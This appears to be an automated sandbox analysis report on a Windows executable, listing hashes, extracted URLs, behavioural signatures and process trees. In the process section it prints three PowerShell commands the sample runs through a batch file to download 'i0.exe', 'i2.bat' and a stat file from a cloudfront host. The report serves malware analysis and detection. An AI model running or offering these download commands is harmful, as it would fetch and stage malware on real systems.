Analysis
-
max time kernel
141s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
16-05-2024 09:46
Static task
static1
Behavioral task
behavioral1
Sample
7282845f442c81d8f609bcc1a2853308.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7282845f442c81d8f609bcc1a2853308.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/INetC.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/INetC.dll
Resource
win10v2004-20240508-en
General
-
Target
7282845f442c81d8f609bcc1a2853308.exe
-
Size
49KB
-
MD5
7282845f442c81d8f609bcc1a2853308
-
SHA1
ec1d936a0d8fb0da694465264e67094d0c91bd9f
-
SHA256
0c9ea8041ed332af6188a0c0f90b5d318fcd547c9588169547a97326276f49b1
-
SHA512
25792929e23d18583024eca5af6486e47f44be9332252bb302d461a645ee6822b77bf6e5b5ba135ceabe4ddd813c4e72a80910b2638caa49cfa1767cc0cd6247
-
SSDEEP
1536:XferrLkSRoe8C4UZsys0Dh1duFp7FI+PlI:Xfi3k+oWDBDh1duFpaWlI
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1002
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 66 1988 powershell.exe 68 3132 powershell.exe 74 4768 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 3016 7282845f442c81d8f609bcc1a2853308.exe -
pid Process 3132 powershell.exe 4768 powershell.exe 1988 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 4768 powershell.exe 4768 powershell.exe 4768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3016 wrote to memory of 4072 3016 7282845f442c81d8f609bcc1a2853308.exe 92 PID 3016 wrote to memory of 4072 3016 7282845f442c81d8f609bcc1a2853308.exe 92 PID 3016 wrote to memory of 4072 3016 7282845f442c81d8f609bcc1a2853308.exe 92 PID 4072 wrote to memory of 1988 4072 cmd.exe 94 PID 4072 wrote to memory of 1988 4072 cmd.exe 94 PID 4072 wrote to memory of 1988 4072 cmd.exe 94 PID 4072 wrote to memory of 3132 4072 cmd.exe 104 PID 4072 wrote to memory of 3132 4072 cmd.exe 104 PID 4072 wrote to memory of 3132 4072 cmd.exe 104 PID 4072 wrote to memory of 4768 4072 cmd.exe 105 PID 4072 wrote to memory of 4768 4072 cmd.exe 105 PID 4072 wrote to memory of 4768 4072 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\7282845f442c81d8f609bcc1a2853308.exe"C:\Users\Admin\AppData\Local\Temp\7282845f442c81d8f609bcc1a2853308.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsk1DD5.tmp\app.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1002','stat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:81⤵PID:524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
54KB
MD5f6e93574f0766b8f0592ed878e90a5c1
SHA1092c08f0ef960133e529e94ae4f859fa9efdfcad
SHA25635c99f2447e52172cb93118f50a772cdf206fa53c9ad82354cf31be86da5a298
SHA512f437535000c95948991d88314e6883d2e541f24b50fb40693e0c026ed10f0fbf560f3b9313e496866882b7b20fa3d2127d96a69097097c0438a57eb2eeb46088
-
Filesize
18KB
MD5a65382d67896e5da5014edb1adadd652
SHA10ed1b7619dad3781a067b7aa911ecfce5b476434
SHA256409d24c30396be9283da4c895bccdff2b0e242b6d86da600529512856f4215bf
SHA512fefccb9bad405ed5d7a6a944842642dfdf56ee8de5c99e1f3503b3b6f387b9e6dcc66be0cb801b8d2634810bbde81509a69e466733e8eb8dd498304c9f013990
-
Filesize
17KB
MD53cea87b1193d73215ffb3c854e82a174
SHA14989fb4f211e6bb76a505f55c8019750310b0ea9
SHA25686dfacd95be837b8f2c39a921263d231c9527485d9fd43c82b8459eeecc49d7a
SHA51218202be6ad1cb1a69cc0650324a7b8c77991e438c2be9c5c76b34ce54e7047a9bc5b3923b8fc8c1298b6280e76e9af5027e9bff47900c90e71563f722379d9e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d
-
Filesize
735B
MD584afbd89a24af88b26d1995e56126e25
SHA124c322160e6043d23a1b04af559da6b457d949ae
SHA256f4e320e1488c1c67d04d687ba4060f45c80a9ccd70788a4d28768dfc0e99cf91
SHA512ac9cd31dee1ee8010bc1250784b81649c53efc1e91488f724b2ba4ac27de591abfc74ff733103abf62a260daf1fc8e3fd8994ae20d589140d7316e175454dd38